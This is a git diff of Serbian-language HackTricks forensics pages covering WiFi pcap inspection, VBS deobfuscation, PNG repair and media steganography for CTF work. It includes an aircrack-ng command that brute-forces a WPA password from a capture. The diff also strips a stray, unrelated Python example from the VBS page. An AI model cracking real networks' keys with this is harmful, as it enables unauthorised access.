[https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) * [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini da podržite HackTricks: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu**, pogledajte [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index 8a5502a73..a7e2a96bc 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md @@ -1,21 +1,22 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} # Provera BSSID-ova -Kada dobijete snimak čiji je glavni saobraćaj Wifi, koristeći WireShark, možete početi istraživanje svih SSID-ova snimka sa _Wireless --> WLAN Traffic_: +Kada primite snimak čiji je glavni saobraćaj Wifi koristeći WireShark, možete početi istraživanje svih SSID-ova snimka sa _Wireless --> WLAN Traffic_: ![](<../../../.gitbook/assets/image (424).png>) @@ -23,46 +24,26 @@ Kada dobijete snimak čiji je glavni saobraćaj Wifi, koristeći WireShark, mož ## Brute Force -Jedna od kolona na tom ekranu ukazuje da li je **pronađena bilo kakva autentifikacija unutar pcap-a**. Ako je to slučaj, možete pokušati Brute Force koristeći `aircrack-ng`: +Jedna od kolona na tom ekranu pokazuje da li je **bilo kakva autentifikacija pronađena unutar pcap-a**. Ukoliko je to slučaj, možete pokušati da je probijete koristeći `aircrack-ng`: ```bash aircrack-ng -w pwds-file.txt -b file.pcap ``` -Na primer, povratit će WPA lozinku koja štiti PSK (pre-shared key), koja će biti potrebna kasnije za dešifrovanje saobraćaja. +# Podaci u Bitovima / Bočni Kanal -# Podaci u balisama / bočni kanal +Ako sumnjate da **podaci cure unutar bitova Wi-Fi mreže** možete proveriti bitove mreže koristeći filter poput sledećeg: `wlan contains `, ili `wlan.ssid == "IMEmreže"` pretražite filtrirane pakete za sumnjive niske. -Ako sumnjate da **podaci cure unutar balisa WiFi mreže**, možete proveriti balise mreže koristeći filter poput sledećeg: `wlan contains `, ili `wlan.ssid == "IMEmreže"` pretražite filtrirane pakete u potrazi za sumnjivim nizovima. +# Pronalaženje Nepoznatih MAC Adresa u Wi-Fi Mreži -# Pronalaženje nepoznatih MAC adresa u WiFi mreži - -Sledeći link će biti koristan za pronalaženje **mašina koje šalju podatke unutar WiFi mreže**: +Sledeći link će biti koristan za pronalaženje **mašina koje šalju podatke unutar Wi-Fi mreže**: * `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` -Ako već znate **MAC adrese, možete ih ukloniti iz rezultata** dodavanjem provere poput ove: `&& !(wlan.addr==5c:51:88:31:a0:3b)` +Ako već znate **MAC adrese, možete ih ukloniti iz rezultata** dodavanjem provera poput ove: `&& !(wlan.addr==5c:51:88:31:a0:3b)` -Kada ste otkrili **nepoznate MAC adrese** koje komuniciraju unutar mreže, možete koristiti **filtere** poput sledećeg: `wlan.addr== && (ftp || http || ssh || telnet)` da biste filtrirali njen saobraćaj. Imajte na umu da su filteri ftp/http/ssh/telnet korisni ako ste dešifrovali saobraćaj. +Kada otkrijete **nepoznate MAC** adrese koje komuniciraju unutar mreže, možete koristiti **filtere** poput sledećeg: `wlan.addr== && (ftp || http || ssh || telnet)` da biste filtrirali njen saobraćaj. Imajte na umu da su ftp/http/ssh/telnet filteri korisni ako ste dešifrovali saobraćaj. -# Dešifrovanje saobraćaja +# Dekriptovanje Saobraćaja -Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit +Uredi --> Postavke --> Protokoli --> IEEE 802.11--> Uredi ![](<../../../.gitbook/assets/image (426).png>) - - - - - -
- -Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! - -Drugi načini podrške HackTricks-u: - -* Ako želite videti **oglašavanje vaše kompanije u HackTricks-u** ili **preuzeti HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. - -
diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md index a917b43fa..ddb861b58 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md @@ -1,19 +1,20 @@ +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -Ovde možete pronaći interesantne trikove za specifične tipove fajlova i/ili softvere: +Ovde možete pronaći zanimljive trikove za specifične tipove fajlova i/ili softvere: {% page-ref page=".pyc.md" %} @@ -37,16 +38,17 @@ Ovde možete pronaći interesantne trikove za specifične tipove fajlova i/ili s +{% hint style="success" %} +Učite i vežbajte hakovanje AWS-a:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte hakovanje GCP-a: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md index f8940045e..daadd6269 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Učite i vežbajte AWS hakovanje:[**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} Neki korisni saveti za debagovanje/deobfuskaciju zlonamernog VBS fajla: @@ -24,23 +25,10 @@ Wscript.Echo "Like this?" ' this is a comment ``` ## Test - -Ovo je testni dokument za proveru prevoda. ```bash cscript.exe file.vbs ``` ## Upisivanje podataka u datoteku - -Da biste upisali podatke u datoteku, možete koristiti funkciju `Write` u Pythonu. Evo osnovnog primjera: - -```python -with open('datoteka.txt', 'w') as f: - f.write('Ovo je primjer teksta koji će biti upisan u datoteku.') -``` - -U ovom primjeru, `datoteka.txt` je naziv datoteke u koju želite upisati podatke. Koristimo `with` izjavu kako bismo se pobrinuli da se datoteka pravilno zatvori nakon upisa. Funkcija `write` se koristi za upisivanje teksta u datoteku. - -Nakon izvršavanja ovog koda, datoteka `datoteka.txt` će biti stvorena (ako već ne postoji) i sadržavat će tekst "Ovo je primjer teksta koji će biti upisan u datoteku." ```js Function writeBinary(strBinary, strPath) @@ -65,16 +53,17 @@ End With End Function ``` +{% hint style="success" %} +Učite i vežbajte AWS hakovanje: [**HackTricks obuka AWS Crveni Tim Ekspert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Učite i vežbajte GCP hakovanje: [**HackTricks obuka GCP Crveni Tim Ekspert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE PRETPLATE**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index eea7175ed..5ed82770b 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,33 +1,20 @@ -
- -Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! - -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. - -
- -**PNG fajlovi** su visoko cenjeni u **CTF izazovima** zbog njihovog **bezgubitnog kompresovanja**, što ih čini idealnim za ugradnju skrivenih podataka. Alati poput **Wireshark-a** omogućavaju analizu PNG fajlova razlaganjem njihovih podataka unutar mrežnih paketa, otkrivajući ugrađene informacije ili anomalije. - -Za proveru celovitosti PNG fajlova i popravku oštećenja, ključan alat je **pngcheck**, koji pruža funkcionalnost komandne linije za validaciju i dijagnostikovanje PNG fajlova ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Kada su fajlovi izvan jednostavnih popravki, online servisi poput [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) pružaju web-bazno rešenje za **popravku oštećenih PNG-ova**, pomažući u oporavku ključnih podataka za učesnike CTF-a. - -Ove strategije ističu važnost sveobuhvatnog pristupa u CTF-ovima, koristeći kombinaciju analitičkih alata i tehnika popravke kako bi se otkrili i povratili skriveni ili izgubljeni podaci. +{% hint style="success" %} +Naučite i vežbajte AWS hakovanje:[**HackTricks obuka AWS Red Tim Ekspert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte GCP hakovanje: [**HackTricks obuka GCP Red Tim Ekspert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} + +**PNG fajlovi** su visoko cenjeni u **CTF izazovima** zbog svoje **bez gubitaka kompresije**, čineći ih idealnim za ugradnju skrivenih podataka. Alati poput **Wireshark** omogućavaju analizu PNG fajlova razlaganjem njihovih podataka unutar mrežnih paketa, otkrivajući ugrađene informacije ili anomalije. + +Za proveru integriteta PNG fajlova i popravku oštećenja, **pngcheck** je ključni alat koji pruža funkcionalnost komandne linije za validaciju i dijagnostikovanje PNG fajlova ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Kada fajlovi zahtevaju kompleksnije popravke, online servisi poput [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) pružaju web bazirano rešenje za **popravku oštećenih PNG-ova**, pomažući u oporavku ključnih podataka za učesnike CTF-a. + +Ove strategije ističu važnost sveobuhvatnog pristupa u CTF-ovima, koristeći kombinaciju analitičkih alata i tehnika popravke kako bi se otkrili i oporavili skriveni ili izgubljeni podaci. diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index e3d2ff3bf..de868a1f9 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,41 +1,42 @@ +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks obuka AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks obuka GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)! +Podržite HackTricks -Drugi načini podrške HackTricks-u: - -* Ako želite da vidite **vašu kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE PRETPLATE**](https://github.com/sponsors/carlospolop)! -* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family) -* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume. +* Proverite [**planove pretplate**](https://github.com/sponsors/carlospolop)! +* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Delite hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
+{% endhint %} -**Manipulacija audio i video fajlovima** je osnova u izazovima **CTF forenzike**, koristeći **steganografiju** i analizu metapodataka za skrivanje ili otkrivanje tajnih poruka. Alati poput **[mediainfo](https://mediaarea.net/en/MediaInfo)** i **`exiftool`** su neophodni za pregledanje metapodataka fajlova i identifikaciju vrsta sadržaja. +**Manipulacija audio i video fajlovima** je osnovna tehnika u **CTF forenzičkim izazovima**, koristeći **steganografiju** i analizu metapodataka za skrivanje ili otkrivanje tajnih poruka. Alati poput **[mediainfo](https://mediaarea.net/en/MediaInfo)** i **`exiftool`** su neophodni za pregledanje metapodataka fajlova i identifikaciju vrsta sadržaja. -Za audio izazove, **[Audacity](http://www.audacityteam.org/)** se ističe kao vodeći alat za pregledanje talasnih oblika i analizu spektrograma, što je ključno za otkrivanje teksta kodiranog u audio formatu. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** se visoko preporučuje za detaljnu analizu spektrograma. **Audacity** omogućava manipulaciju audio snimcima kao što su usporavanje ili obrtanje traka kako bi se otkrile skrivene poruke. **[Sox](http://sox.sourceforge.net/)**, komandna linija, se odlično snalazi u konverziji i uređivanju audio fajlova. +Za audio izazove, **[Audacity](http://www.audacityteam.org/)** se ističe kao vodeći alat za pregled talasnih oblika i analizu spektrograma, neophodnih za otkrivanje teksta kodiranog u audio formatu. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** se visoko preporučuje za detaljnu analizu spektrograma. **Audacity** omogućava manipulaciju zvuka poput usporavanja ili obrtanja traka radi otkrivanja skrivenih poruka. **[Sox](http://sox.sourceforge.net/)**, alat za komandnu liniju, odličan je za konvertovanje i uređivanje audio fajlova. -**Manipulacija najmanje značajnim bitovima (LSB)** je česta tehnika u audio i video steganografiji, iskorišćavajući fiksne delove medijskih fajlova za skriveno ugrađivanje podataka. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** je koristan za dekodiranje poruka skrivenih kao **DTMF tonovi** ili **Morseov kod**. +**Manipulacija najmanje značajnim bitovima (LSB)** je česta tehnika u audio i video steganografiji, iskorišćavajući fiksne delove fajlova medija za skriveno ugrađivanje podataka. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** je koristan za dekodiranje poruka skrivenih kao **DTMF tonovi** ili **Morseov kod**. -Video izazovi često uključuju kontejnerske formate koji sadrže audio i video tokove. **[FFmpeg](http://ffmpeg.org/)** je alat za analizu i manipulaciju ovim formatima, sposoban za de-multiplexiranje i reprodukciju sadržaja. Za programere, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integriše mogućnosti FFmpeg-a u Python za napredne skriptabilne interakcije. +Video izazovi često uključuju kontejnerske formate koji grupišu audio i video tokove. **[FFmpeg](http://ffmpeg.org/)** je osnovni alat za analizu i manipulaciju ovih formata, sposoban za demultipleksiranje i reprodukciju sadržaja. Za programere, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integriše mogućnosti FFmpeg-a u Python za napredne skriptne interakcije. -Ova paleta alata naglašava potrebnu fleksibilnost u CTF izazovima, gde učesnici moraju primeniti širok spektar tehnika analize i manipulacije kako bi otkrili skrivene podatke unutar audio i video fajlova. +Ovaj niz alata ističe potrebnu raznovrsnost u CTF izazovima, gde učesnici moraju primeniti širok spektar tehnika analize i manipulacije kako bi otkrili skrivene podatke unutar audio i video fajlova. ## Reference * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) - + +{% hint style="success" %} +Naučite i vežbajte hakovanje AWS-a:[**HackTricks obuka AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Naučite i vežbajte hakovanje GCP-a: [**HackTricks obuka GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
